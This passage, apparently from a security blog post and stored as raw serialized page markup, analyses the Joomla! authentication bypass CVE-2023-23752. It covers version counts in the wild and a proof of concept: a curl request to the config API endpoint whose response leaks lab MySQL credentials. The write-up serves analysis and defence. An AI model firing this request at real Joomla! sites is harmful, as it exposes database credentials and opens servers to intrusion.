Version 4 Versions in the Wild",[11128,103881],{":labels":103882,":values":103883},"[\"4.3.0\",\"4.2.9\",\"4.2.8\",\"4.2.7\",\"4.2.6\",\"4.2.5\",\"4.2.4\",\"4.2.3\",\"4.2.2\",\"4.2.1\",\"4.2.0\",\"4.1.5\",\"4.1.4\",\"4.1.3\",\"4.1.2\",\"4.1.1\",\"4.1.0\",\"4.0.6\",\"4.0.5\",\"4.0.4\",\"4.0.3\",\"4.0.2\",\"4.0.1\",\"4.0.0\"]","[3,984,876,214,429,198,104,133,101,25,38,794,92,39,116,1,104,73,53,106,82,15,2,15]",[18,103885,103886],{},"Which means, despite continued interest from attackers, this vulnerability has almost run its course just a month after disclosure.",[18,103888,103889,103890,103895,103896,103899],{},"Based on the versions of the internet-facing Joomla!, we believe this vulnerability, while dangerous, was never a huge issue (nothing approaching ",[47,103891,103894],{"href":103892,"rel":103893},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2018\u002F04\u002F27\u002Fdrupalgeddon-vulnerability-what-is-it-are-you-impacted\u002F",[51],"Drupelgaddon"," at least). So what about this vulnerability has attackers so excited that they are ",[1131,103897,103898],{},"still"," landing new exploits on GitHub?",[61,103901,103903],{"id":103902},"cve-2023-23752-to-code-execution-1","CVE-2023-23752 to Code Execution #1",[18,103905,103906],{},"As discussed, CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. 
The following demonstrates the leak:",[1354,103908,103910],{"className":31740,"code":103909,"language":2186,"meta":219,"style":219},"curl -v http:\u002F\u002F10.9.49.205\u002Fapi\u002Findex.php\u002Fv1\u002Fconfig\u002Fapplication?public=true\n*   Trying 10.9.49.205:80...\n* TCP_NODELAY set\n* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)\n> GET \u002Fapi\u002Findex.php\u002Fv1\u002Fconfig\u002Fapplication?public=true HTTP\u002F1.1\n> Host: 10.9.49.205\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200 OK\n\u003C Date: Mon, 20 Mar 2023 15:14:05 GMT\n\u003C Server: Apache\u002F2.4.41 (Ubuntu)\n\u003C x-frame-options: SAMEORIGIN\n\u003C referrer-policy: strict-origin-when-cross-origin\n\u003C cross-origin-opener-policy: same-origin\n\u003C X-Powered-By: JoomlaAPI\u002F1.0\n\u003C Expires: Wed, 17 Aug 2005 00:00:00 GMT\n\u003C Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT\n\u003C Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\n\u003C Pragma: no-cache\n\u003C Content-Length: 1983\n\u003C Content-Type: application\u002Fvnd.api+json; charset=utf-8\n\u003C\n{\"links\":{\"self\":\"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fconfig\\\u002Fapplication?public=true\",\"next\":\"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fconfig\\\u002Fapplication?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20\",\"last\":\"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fconfig\\\u002Fapplication?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20\"},\"data\":[{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"offline\":false,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"offline_message\":\"This site is down for maintenance.\u003Cbr>Please check back again 
soon.\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"display_offline_message\":1,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"offline_image\":\"\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"sitename\":\"vulncheck\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"editor\":\"tinymce\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"captcha\":\"0\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"list_limit\":20,\"i* Connection #0 to host 10.9.49.205 left intact\nd\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"access\":1,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"debug\":false,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"debug_lang\":false,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"debug_lang_const\":true,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"dbtype\":\"mysqli\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"host\":\"localhost\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"user\":\"root\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"password\":\"labpass1\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"db\":\"joomla_db\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"dbprefix\":\"xj3n0_\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"dbencryption\":0,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"dbsslverifyservercert\":false,\"id\":224}}],\"meta\":{\"total-pages\":4}}\n",[886,103911,103912,103923,103930,103936,103948,103961,103968,103974,103986,103990,103996,104002,104009,104021,104028,104035,104042,104049,104056,104063,104083,104090,104097,104113,104117,104691],{"__ignoreMap":219},[1373,103913,103914,1
03916,103918,103921],{"class":1375,"line":1376},[1373,103915,1557],{"class":2206},[1373,103917,45584],{"class":2209},[1373,103919,103920],{"class":1391}," http:\u002F\u002F10.9.49.205\u002Fapi\u002Findex.php\u002Fv1\u002Fconfig\u002Fapplication?public=",[1373,103922,45801],{"class":7054},[1373,103924,103925,103927],{"class":1375,"line":220},[1373,103926,35613],{"class":1397},[1373,103928,103929],{"class":4640},"   Trying 10.9.49.205:80...\n",[1373,103931,103932,103934],{"class":1375,"line":1266},[1373,103933,35613],{"class":1397},[1373,103935,76077],{"class":4640},[1373,103937,103938,103940,103943,103946],{"class":1375,"line":1852},[1373,103939,35613],{"class":1397},[1373,103941,103942],{"class":4640}," Connected to 10.9.49.205 (",[1373,103944,103945],{"class":2206},"10.9.49.205",[1373,103947,88981],{"class":4640},[1373,103949,103950,103952,103954,103957,103959],{"class":1375,"line":4692},[1373,103951,5384],{"class":1397},[1373,103953,76097],{"class":2206},[1373,103955,103956],{"class":1391}," \u002Fapi\u002Findex.php\u002Fv1\u002Fconfig\u002Fapplication?public=",[1373,103958,10874],{"class":7054},[1373,103960,35589],{"class":1391},[1373,103962,103963,103965],{"class":1375,"line":4724},[1373,103964,5384],{"class":1397},[1373,103966,103967],{"class":4640}," Host: 
10.9.49.205\n",[1373,103969,103970,103972],{"class":1375,"line":4756},[1373,103971,5384],{"class":1397},[1373,103973,35603],{"class":4640},[1373,103975,103976,103978,103980,103982,103984],{"class":1375,"line":4768},[1373,103977,5384],{"class":1397},[1373,103979,35610],{"class":4640},[1373,103981,35613],{"class":1397},[1373,103983,2180],{"class":4640},[1373,103985,35618],{"class":1397},[1373,103987,103988],{"class":1375,"line":4792},[1373,103989,6765],{"class":1397},[1373,103991,103992,103994],{"class":1375,"line":4798},[1373,103993,35613],{"class":1397},[1373,103995,76148],{"class":4640},[1373,103997,103998,104000],{"class":1375,"line":4806},[1373,103999,11852],{"class":1397},[1373,104001,89055],{"class":4640},[1373,104003,104004,104006],{"class":1375,"line":4817},[1373,104005,11852],{"class":1397},[1373,104007,104008],{"class":4640}," Date: Mon, 20 Mar 2023 15:14:05 GMT\n",[1373,104010,104011,104013,104016,104019],{"class":1375,"line":4825},[1373,104012,11852],{"class":1397},[1373,104014,104015],{"class":4640}," Server: Apache\u002F2.4.41 (",[1373,104017,104018],{"class":2206},"Ubuntu",[1373,104020,11875],{"class":4640},[1373,104022,104023,104025],{"class":1375,"line":4835},[1373,104024,11852],{"class":1397},[1373,104026,104027],{"class":4640}," x-frame-options: SAMEORIGIN\n",[1373,104029,104030,104032],{"class":1375,"line":4843},[1373,104031,11852],{"class":1397},[1373,104033,104034],{"class":4640}," referrer-policy: strict-origin-when-cross-origin\n",[1373,104036,104037,104039],{"class":1375,"line":4849},[1373,104038,11852],{"class":1397},[1373,104040,104041],{"class":4640}," cross-origin-opener-policy: same-origin\n",[1373,104043,104044,104046],{"class":1375,"line":4877},[1373,104045,11852],{"class":1397},[1373,104047,104048],{"class":4640}," X-Powered-By: JoomlaAPI\u002F1.0\n",[1373,104050,104051,104053],{"class":1375,"line":4915},[1373,104052,11852],{"class":1397},[1373,104054,104055],{"class":4640}," Expires: Wed, 17 Aug 2005 00:00:00 
GMT\n",[1373,104057,104058,104060],{"class":1375,"line":4931},[1373,104059,11852],{"class":1397},[1373,104061,104062],{"class":4640}," Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT\n",[1373,104064,104065,104067,104070,104072,104075,104078,104080],{"class":1375,"line":4947},[1373,104066,11852],{"class":1397},[1373,104068,104069],{"class":4640}," Cache-Control: no-store, no-cache, must-revalidate, post-check",[1373,104071,5417],{"class":1397},[1373,104073,104074],{"class":1391},"0,",[1373,104076,104077],{"class":4640}," pre-check",[1373,104079,5417],{"class":1397},[1373,104081,104082],{"class":1391},"0\n",[1373,104084,104085,104087],{"class":1375,"line":4952},[1373,104086,11852],{"class":1397},[1373,104088,104089],{"class":4640}," Pragma: no-cache\n",[1373,104091,104092,104094],{"class":1375,"line":6776},[1373,104093,11852],{"class":1397},[1373,104095,104096],{"class":4640}," Content-Length: 1983\n",[1373,104098,104099,104101,104104,104106,104108,104110],{"class":1375,"line":6781},[1373,104100,11852],{"class":1397},[1373,104102,104103],{"class":4640}," Content-Type: 
application\u002Fvnd.api+json",[1373,104105,39663],{"class":1383},[1373,104107,48986],{"class":4640},[1373,104109,5417],{"class":1397},[1373,104111,104112],{"class":1391},"utf-8\n",[1373,104114,104115],{"class":1375,"line":7524},[1373,104116,35662],{"class":1397},[1373,104118,104119,104121,104124,104126,104128,104130,104132,104135,104138,104140,104142,104145,104147,104149,104151,104153,104155,104157,104160,104163,104165,104168,104170,104172,104175,104177,104179,104181,104183,104185,104187,104190,104192,104194,104196,104199,104201,104204,104206,104208,104211,104213,104215,104217,104220,104222,104225,104228,104231,104234,104236,104239,104241,104243,104245,104247,104249,104251,104253,104255,104257,104259,104262,104264,104267,104270,104272,104274,104276,104279,104281,104283,104285,104287,104290,104292,104295,104298,104301,104303,104305,104307,104309,104311,104314,104316,104318,104320,104322,104324,104326,104328,104330,104332,104334,104336,104338,104340,104342,104344,104346,104348,104350,104352,104354,104356,104359,104361,104364,104366,104368,104370,104372,104374,104376,104378,104380,104382,104384,104386,104388,104390,104392,104394,104396,104398,104400,104402,104404,104406,104408,104410,104412,104414,104417,104419,104421,104423,104425,104427,104429,104431,104433,104435,104437,104439,104441,104443,104445,104447,104449,104451,104453,104455,104457,104459,104461,104463,104465,104467,104469,104471,104473,104475,104478,104480,104482,104484,104486,104488,104490,104492,104494,104496,104498,104500,104502,104504,104506,104508,104510,104512,104514,104516,104518,104520,104522,104524,104526,104528,104530,104532,104534,104536,104538,104540,104543,104545,104547,104549,104552,104554,104556,104558,104560,104562,104564,104566,104568,104570,104572,104574,104576,104578,104580,104582,104584,104586,104588,104590,104592,104594,104596,104598,104600,104602,104604,104606,104609,104611,104613,104615,104617,104619,104621,104623,104625,104627,104629,104631,104633,104635,104637,104639,104641,104643,1
04645,104647,104649,104651,104653,104655,104657,104659,104661,104663,104665,104667,104669,104671,104674,104676,104679,104681,104683,104685,104688],{"class":1375,"line":7530},[1373,104120,9149],{"class":1383},[1373,104122,104123],{"class":2206},"\"links\"",[1373,104125,4606],{"class":1379},[1373,104127,9149],{"class":1391},[1373,104129,183],{"class":4640},[1373,104131,76212],{"class":2206},[1373,104133,104134],{"class":2206},"\":\"",[1373,104136,104137],{"class":2206},"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fconfig\\\u002Fapplication?public",[1373,104139,5417],{"class":1391},[1373,104141,10874],{"class":1379},[1373,104143,104144],{"class":2206},"\",\"",[1373,104146,25220],{"class":2206},[1373,104148,104134],{"class":2206},[1373,104150,104137],{"class":2206},[1373,104152,5417],{"class":1391},[1373,104154,10874],{"class":1379},[1373,104156,7218],{"class":1383},[1373,104158,104159],{"class":2206},"page%5Boffset%5D",[1373,104161,104162],{"class":1391},"=20",[1373,104164,7218],{"class":1383},[1373,104166,104167],{"class":2206},"page%5Blimit%5D",[1373,104169,104162],{"class":1391},[1373,104171,104144],{"class":2206},[1373,104173,104174],{"class":2206},"last",[1373,104176,104134],{"class":2206},[1373,104178,104137],{"class":2206},[1373,104180,5417],{"class":1391},[1373,104182,10874],{"class":1379},[1373,104184,7218],{"class":1383},[1373,104186,104159],{"class":2206},[1373,104188,104189],{"class":1391},"=60",[1373,104191,7218],{"class":1383},[1373,104193,104167],{"class":2206},[1373,104195,104162],{"class":1391},[1373,104197,104198],{"class":2206},"\"},\"",[1373,104200,9156],{"class":2206},[1373,104202,104203],{"class":2206},"\":[{\"",[1373,104205,26399],{"class":1379},[1373,104207,104134],{"class":2206},[1373,104209,104210],{"class":2206},"application",[1373,104212,104144],{"class":2206},[1373,104214,26412],{"class":2206},[1373,104216,104134],{"class":2206},[1373,104218,104219],{"class":2206},"224",[1373,104221,104144],{"class":2206},[1
373,104223,104224],{"class":2206},"attributes",[1373,104226,104227],{"class":2206},"\":{\"",[1373,104229,104230],{"class":2206},"offline",[1373,104232,104233],{"class":2206},"\":false,\"",[1373,104235,26412],{"class":2206},[1373,104237,104238],{"class":2206},"\":224}},{\"",[1373,104240,26399],{"class":1379},[1373,104242,104134],{"class":2206},[1373,104244,104210],{"class":2206},[1373,104246,104144],{"class":2206},[1373,104248,26412],{"class":2206},[1373,104250,104134],{"class":2206},[1373,104252,104219],{"class":2206},[1373,104254,104144],{"class":2206},[1373,104256,104224],{"class":2206},[1373,104258,104227],{"class":2206},[1373,104260,104261],{"class":2206},"offline_message",[1373,104263,104134],{"class":2206},[1373,104265,104266],{"class":2206},"This",[1373,104268,104269],{"class":1391}," site",[1373,104271,55517],{"class":1391},[1373,104273,79274],{"class":1391},[1373,104275,55807],{"class":1391},[1373,104277,104278],{"class":1391}," maintenance.",[1373,104280,11852],{"class":1397},[1373,104282,74424],{"class":1391},[1373,104284,11872],{"class":4640},[1373,104286,5384],{"class":1397},[1373,104288,104289],{"class":1391},"Please",[1373,104291,98463],{"class":1391},[1373,104293,104294],{"class":1391}," back",[1373,104296,104297],{"class":1391}," again",[1373,104299,104300],{"class":1391}," 
soon.",[1373,104302,183],{"class":1387},[1373,104304,5437],{"class":1391},[1373,104306,183],{"class":1387},[1373,104308,26412],{"class":1391},[1373,104310,183],{"class":1387},[1373,104312,104313],{"class":1391},":224}},{",[1373,104315,183],{"class":1387},[1373,104317,26399],{"class":1391},[1373,104319,183],{"class":1387},[1373,104321,4606],{"class":1391},[1373,104323,183],{"class":1387},[1373,104325,104210],{"class":1391},[1373,104327,183],{"class":1387},[1373,104329,5437],{"class":1391},[1373,104331,183],{"class":1387},[1373,104333,26412],{"class":1391},[1373,104335,183],{"class":1387},[1373,104337,4606],{"class":1391},[1373,104339,183],{"class":1387},[1373,104341,104219],{"class":1391},[1373,104343,183],{"class":1387},[1373,104345,5437],{"class":1391},[1373,104347,183],{"class":1387},[1373,104349,104224],{"class":1391},[1373,104351,183],{"class":1387},[1373,104353,8304],{"class":1391},[1373,104355,183],{"class":1387},[1373,104357,104358],{"class":1391},"display_offline_message",[1373,104360,183],{"class":1387},[1373,104362,104363],{"class":1391},":1,",[1373,104365,183],{"class":1387},[1373,104367,26412],{"class":1391},[1373,104369,183],{"class":1387},[1373,104371,104313],{"class":1391},[1373,104373,183],{"class":1387},[1373,104375,26399],{"class":1391},[1373,104377,183],{"class":1387},[1373,104379,4606],{"class":1391},[1373,104381,183],{"class":1387},[1373,104383,104210],{"class":1391},[1373,104385,183],{"class":1387},[1373,104387,5437],{"class":1391},[1373,104389,183],{"class":1387},[1373,104391,26412],{"class":1391},[1373,104393,183],{"class":1387},[1373,104395,4606],{"class":1391},[1373,104397,183],{"class":1387},[1373,104399,104219],{"class":1391},[1373,104401,183],{"class":1387},[1373,104403,5437],{"class":1391},[1373,104405,183],{"class":1387},[1373,104407,104224],{"class":1391},[1373,104409,183],{"class":1387},[1373,104411,8304],{"class":1391},[1373,104413,183],{"class":1387},[1373,104415,104416],{"class":1391},"offline_image",[1373,104418,183],{"class":138
7},[1373,104420,4606],{"class":1391},[1373,104422,7083],{"class":1387},[1373,104424,5437],{"class":1391},[1373,104426,183],{"class":1387},[1373,104428,26412],{"class":1391},[1373,104430,183],{"class":1387},[1373,104432,104313],{"class":1391},[1373,104434,183],{"class":1387},[1373,104436,26399],{"class":1391},[1373,104438,183],{"class":1387},[1373,104440,4606],{"class":1391},[1373,104442,183],{"class":1387},[1373,104444,104210],{"class":1391},[1373,104446,183],{"class":1387},[1373,104448,5437],{"class":1391},[1373,104450,183],{"class":1387},[1373,104452,26412],{"class":1391},[1373,104454,183],{"class":1387},[1373,104456,4606],{"class":1391},[1373,104458,183],{"class":1387},[1373,104460,104219],{"class":1391},[1373,104462,183],{"class":1387},[1373,104464,5437],{"class":1391},[1373,104466,183],{"class":1387},[1373,104468,104224],{"class":1391},[1373,104470,183],{"class":1387},[1373,104472,8304],{"class":1391},[1373,104474,183],{"class":1387},[1373,104476,104477],{"class":1391},"sitename",[1373,104479,183],{"class":1387},[1373,104481,4606],{"class":1391},[1373,104483,183],{"class":1387},[1373,104485,19383],{"class":1391},[1373,104487,183],{"class":1387},[1373,104489,5437],{"class":1391},[1373,104491,183],{"class":1387},[1373,104493,26412],{"class":1391},[1373,104495,183],{"class":1387},[1373,104497,104313],{"class":1391},[1373,104499,183],{"class":1387},[1373,104501,26399],{"class":1391},[1373,104503,183],{"class":1387},[1373,104505,4606],{"class":1391},[1373,104507,183],{"class":1387},[1373,104509,104210],{"class":1391},[1373,104511,183],{"class":1387},[1373,104513,5437],{"class":1391},[1373,104515,183],{"class":1387},[1373,104517,26412],{"class":1391},[1373,104519,183],{"class":1387},[1373,104521,4606],{"class":1391},[1373,104523,183],{"class":1387},[1373,104525,104219],{"class":1391},[1373,104527,183],{"class":1387},[1373,104529,5437],{"class":1391},[1373,104531,183],{"class":1387},[1373,104533,104224],{"class":1391},[1373,104535,183],{"class":1387},[1373,104537,8304
],{"class":1391},[1373,104539,183],{"class":1387},[1373,104541,104542],{"class":1391},"editor",[1373,104544,183],{"class":1387},[1373,104546,4606],{"class":1391},[1373,104548,183],{"class":1387},[1373,104550,104551],{"class":1391},"tinymce",[1373,104553,183],{"class":1387},[1373,104555,5437],{"class":1391},[1373,104557,183],{"class":1387},[1373,104559,26412],{"class":1391},[1373,104561,183],{"class":1387},[1373,104563,104313],{"class":1391},[1373,104565,183],{"class":1387},[1373,104567,26399],{"class":1391},[1373,104569,183],{"class":1387},[1373,104571,4606],{"class":1391},[1373,104573,183],{"class":1387},[1373,104575,104210],{"class":1391},[1373,104577,183],{"class":1387},[1373,104579,5437],{"class":1391},[1373,104581,183],{"class":1387},[1373,104583,26412],{"class":1391},[1373,104585,183],{"class":1387},[1373,104587,4606],{"class":1391},[1373,104589,183],{"class":1387},[1373,104591,104219],{"class":1391},[1373,104593,183],{"class":1387},[1373,104595,5437],{"class":1391},[1373,104597,183],{"class":1387},[1373,104599,104224],{"class":1391},[1373,104601,183],{"class":1387},[1373,104603,8304],{"class":1391},[1373,104605,183],{"class":1387},[1373,104607,104608],{"class":1391},"captcha",[1373,104610,183],{"class":1387},[1373,104612,4606],{"class":1391},[1373,104614,183],{"class":1387},[1373,104616,445],{"class":1391},[1373,104618,183],{"class":1387},[1373,104620,5437],{"class":1391},[1373,104622,183],{"class":1387},[1373,104624,26412],{"class":1391},[1373,104626,183],{"class":1387},[1373,104628,104313],{"class":1391},[1373,104630,183],{"class":1387},[1373,104632,26399],{"class":1391},[1373,104634,183],{"class":1387},[1373,104636,4606],{"class":1391},[1373,104638,183],{"class":1387},[1373,104640,104210],{"class":1391},[1373,104642,183],{"class":1387},[1373,104644,5437],{"class":1391},[1373,104646,183],{"class":1387},[1373,104648,26412],{"class":1391},[1373,104650,183],{"class":1387},[1373,104652,4606],{"class":1391},[1373,104654,183],{"class":1387},[1373,104656,104219],{
"class":1391},[1373,104658,183],{"class":1387},[1373,104660,5437],{"class":1391},[1373,104662,183],{"class":1387},[1373,104664,104224],{"class":1391},[1373,104666,183],{"class":1387},[1373,104668,8304],{"class":1391},[1373,104670,183],{"class":1387},[1373,104672,104673],{"class":1391},"list_limit",[1373,104675,183],{"class":1387},[1373,104677,104678],{"class":1391},":20,",[1373,104680,183],{"class":1387},[1373,104682,49188],{"class":1391},[1373,104684,35613],{"class":6761},[1373,104686,104687],{"class":1391}," Connection",[1373,104689,104690],{"class":4630}," #0 to host 10.9.49.205 left intact\n",[1373,104692,104693,104695,104697,104699,104701,104703,104705,104707,104709,104711,104713,104715,104717,104720,104723,104725,104727,104729,104731,104733,104735,104737,104739,104741,104743,104745,104747,104750,104752,104754,104756,104758,104760,104762,104764,104766,104768,104770,104772,104774,104776,104779,104781,104783,104785,104787,104789,104791,104793,104795,104797,104799,104801,104803,104805,104808,104811,104813,104815,104817,104819,104821,104823,104825,104827,104829,104831,104833,104835,104838,104840,104843,104845,104847,104849,104851,104853,104855,104857,104859,104861,104863,104865,104867,104869,104871,104873,104875,104877,104879,104881,104883,104885,104887,104889,104891,104893,104895,104897,104899,104901,104903,104905,104907,104909,104911,104913,104915,104917,104919,104921,104923,104925,104927,104929,104931,104933,104935,104937,104939,104941,104943,104945,104947,104949,104951,104953,104955,104957,104959,104961,104963,104965,104967,104969,104972,104974,104976,104978,104980,104982,104984,104986,104988,104990,104992,104994,104996,104998,105001,105003,105006,105008,105010,105012,105014,105016,105018,105020,105022,105024,105026,105028,105030,105032,105035,105038,105040,105042,105044,105046,105048,105050,105052,105054,105056,105058,105060,105062,105065,105067,105069,105072,105074,105076,105079],{"class":1375,"line":7546},[1373,104694,39681],{"class":2206},[1373,104696,10423
8],{"class":2206},[1373,104698,26399],{"class":1379},[1373,104700,104134],{"class":2206},[1373,104702,104210],{"class":2206},[1373,104704,104144],{"class":2206},[1373,104706,26412],{"class":2206},[1373,104708,104134],{"class":2206},[1373,104710,104219],{"class":2206},[1373,104712,104144],{"class":2206},[1373,104714,104224],{"class":2206},[1373,104716,104227],{"class":2206},[1373,104718,104719],{"class":2206},"access",[1373,104721,104722],{"class":2206},"\":1,\"",[1373,104724,26412],{"class":2206},[1373,104726,104238],{"class":2206},[1373,104728,26399],{"class":1379},[1373,104730,104134],{"class":2206},[1373,104732,104210],{"class":2206},[1373,104734,104144],{"class":2206},[1373,104736,26412],{"class":2206},[1373,104738,104134],{"class":2206},[1373,104740,104219],{"class":2206},[1373,104742,104144],{"class":2206},[1373,104744,104224],{"class":2206},[1373,104746,104227],{"class":2206},[1373,104748,104749],{"class":2206},"debug",[1373,104751,104233],{"class":2206},[1373,104753,26412],{"class":2206},[1373,104755,104238],{"class":2206},[1373,104757,26399],{"class":1379},[1373,104759,104134],{"class":2206},[1373,104761,104210],{"class":2206},[1373,104763,104144],{"class":2206},[1373,104765,26412],{"class":2206},[1373,104767,104134],{"class":2206},[1373,104769,104219],{"class":2206},[1373,104771,104144],{"class":2206},[1373,104773,104224],{"class":2206},[1373,104775,104227],{"class":2206},[1373,104777,104778],{"class":2206},"debug_lang",[1373,104780,104233],{"class":2206},[1373,104782,26412],{"class":2206},[1373,104784,104238],{"class":2206},[1373,104786,26399],{"class":1379},[1373,104788,104134],{"class":2206},[1373,104790,104210],{"class":2206},[1373,104792,104144],{"class":2206},[1373,104794,26412],{"class":2206},[1373,104796,104134],{"class":2206},[1373,104798,104219],{"class":2206},[1373,104800,104144],{"class":2206},[1373,104802,104224],{"class":2206},[1373,104804,104227],{"class":2206},[1373,104806,104807],{"class":2206},"debug_lang_const",[1373,104809,104810],{"cla
ss":2206},"\":true,\"",[1373,104812,26412],{"class":2206},[1373,104814,104238],{"class":2206},[1373,104816,26399],{"class":1379},[1373,104818,104134],{"class":2206},[1373,104820,104210],{"class":2206},[1373,104822,104144],{"class":2206},[1373,104824,26412],{"class":2206},[1373,104826,104134],{"class":2206},[1373,104828,104219],{"class":2206},[1373,104830,104144],{"class":2206},[1373,104832,104224],{"class":2206},[1373,104834,104227],{"class":2206},[1373,104836,104837],{"class":2206},"dbtype",[1373,104839,104134],{"class":2206},[1373,104841,104842],{"class":2206},"mysqli",[1373,104844,104144],{"class":2206},[1373,104846,26412],{"class":2206},[1373,104848,104238],{"class":2206},[1373,104850,26399],{"class":1379},[1373,104852,104134],{"class":2206},[1373,104854,104210],{"class":2206},[1373,104856,104144],{"class":2206},[1373,104858,26412],{"class":2206},[1373,104860,104134],{"class":2206},[1373,104862,104219],{"class":2206},[1373,104864,104144],{"class":2206},[1373,104866,104224],{"class":2206},[1373,104868,104227],{"class":2206},[1373,104870,63614],{"class":2206},[1373,104872,104134],{"class":2206},[1373,104874,20240],{"class":2206},[1373,104876,104144],{"class":2206},[1373,104878,26412],{"class":2206},[1373,104880,104238],{"class":2206},[1373,104882,26399],{"class":1379},[1373,104884,104134],{"class":2206},[1373,104886,104210],{"class":2206},[1373,104888,104144],{"class":2206},[1373,104890,26412],{"class":2206},[1373,104892,104134],{"class":2206},[1373,104894,104219],{"class":2206},[1373,104896,104144],{"class":2206},[1373,104898,104224],{"class":2206},[1373,104900,104227],{"class":2206},[1373,104902,39933],{"class":2206},[1373,104904,104134],{"class":2206},[1373,104906,48771],{"class":2206},[1373,104908,104144],{"class":2206},[1373,104910,26412],{"class":2206},[1373,104912,104238],{"class":2206},[1373,104914,26399],{"class":1379},[1373,104916,104134],{"class":2206},[1373,104918,104210],{"class":2206},[1373,104920,104144],{"class":2206},[1373,104922,26412],{"class":2
206},[1373,104924,104134],{"class":2206},[1373,104926,104219],{"class":2206},[1373,104928,104144],{"class":2206},[1373,104930,104224],{"class":2206},[1373,104932,104227],{"class":2206},[1373,104934,86310],{"class":2206},[1373,104936,104134],{"class":2206},[1373,104938,89173],{"class":2206},[1373,104940,104144],{"class":2206},[1373,104942,26412],{"class":2206},[1373,104944,104238],{"class":2206},[1373,104946,26399],{"class":1379},[1373,104948,104134],{"class":2206},[1373,104950,104210],{"class":2206},[1373,104952,104144],{"class":2206},[1373,104954,26412],{"class":2206},[1373,104956,104134],{"class":2206},[1373,104958,104219],{"class":2206},[1373,104960,104144],{"class":2206},[1373,104962,104224],{"class":2206},[1373,104964,104227],{"class":2206},[1373,104966,51338],{"class":2206},[1373,104968,104134],{"class":2206},[1373,104970,104971],{"class":2206},"joomla_db",[1373,104973,104144],{"class":2206},[1373,104975,26412],{"class":2206},[1373,104977,104238],{"class":2206},[1373,104979,26399],{"class":1379},[1373,104981,104134],{"class":2206},[1373,104983,104210],{"class":2206},[1373,104985,104144],{"class":2206},[1373,104987,26412],{"class":2206},[1373,104989,104134],{"class":2206},[1373,104991,104219],{"class":2206},[1373,104993,104144],{"class":2206},[1373,104995,104224],{"class":2206},[1373,104997,104227],{"class":2206},[1373,104999,105000],{"class":2206},"dbprefix",[1373,105002,104134],{"class":2206},[1373,105004,105005],{"class":2206},"xj3n0_",[1373,105007,104144],{"class":2206},[1373,105009,26412],{"class":2206},[1373,105011,104238],{"class":2206},[1373,105013,26399],{"class":1379},[1373,105015,104134],{"class":2206},[1373,105017,104210],{"class":2206},[1373,105019,104144],{"class":2206},[1373,105021,26412],{"class":2206},[1373,105023,104134],{"class":2206},[1373,105025,104219],{"class":2206},[1373,105027,104144],{"class":2206},[1373,105029,104224],{"class":2206},[1373,105031,104227],{"class":2206},[1373,105033,105034],{"class":2206},"dbencryption",[1373,105036,105
037],{"class":2206},"\":0,\"",[1373,105039,26412],{"class":2206},[1373,105041,104238],{"class":2206},[1373,105043,26399],{"class":1379},[1373,105045,104134],{"class":2206},[1373,105047,104210],{"class":2206},[1373,105049,104144],{"class":2206},[1373,105051,26412],{"class":2206},[1373,105053,104134],{"class":2206},[1373,105055,104219],{"class":2206},[1373,105057,104144],{"class":2206},[1373,105059,104224],{"class":2206},[1373,105061,104227],{"class":2206},[1373,105063,105064],{"class":2206},"dbsslverifyservercert",[1373,105066,104233],{"class":2206},[1373,105068,26412],{"class":2206},[1373,105070,105071],{"class":2206},"\":224}}],\"",[1373,105073,48983],{"class":2206},[1373,105075,104227],{"class":2206},[1373,105077,105078],{"class":2206},"total-pages",[1373,105080,105081],{"class":2206},"\":4}}\n",[18,105083,105084,105085,105088,105089,105091],{},"In the proof of concept above, the server responds with the credentials ",[886,105086,105087],{},"root:labpass1",", which are the credentials for our test Joomla! MySQL account. But it’s important to know that our test MySQL server was bound to ",[886,105090,48753],{},", so a remote attacker can’t reach the server, making the credentials mostly useless. Binding MySQL to localhost should be the most common configuration, which severely limits this credential leak.",[18,105093,105094,105095,105098,105099,105101],{},"However, it appears there are a good number of internet-facing Joomla! installations that use a MySQL server that ",[1131,105096,105097],{},"isn’t"," bound to ",[886,105100,48753],{},". Censys shows thousands of Joomla! servers colocated with an exposed MySQL server.",[18,105103,105104],{},[68,105105],{":width":10862,"alt":105106,"src":105107},"Censys query with both MySQL and 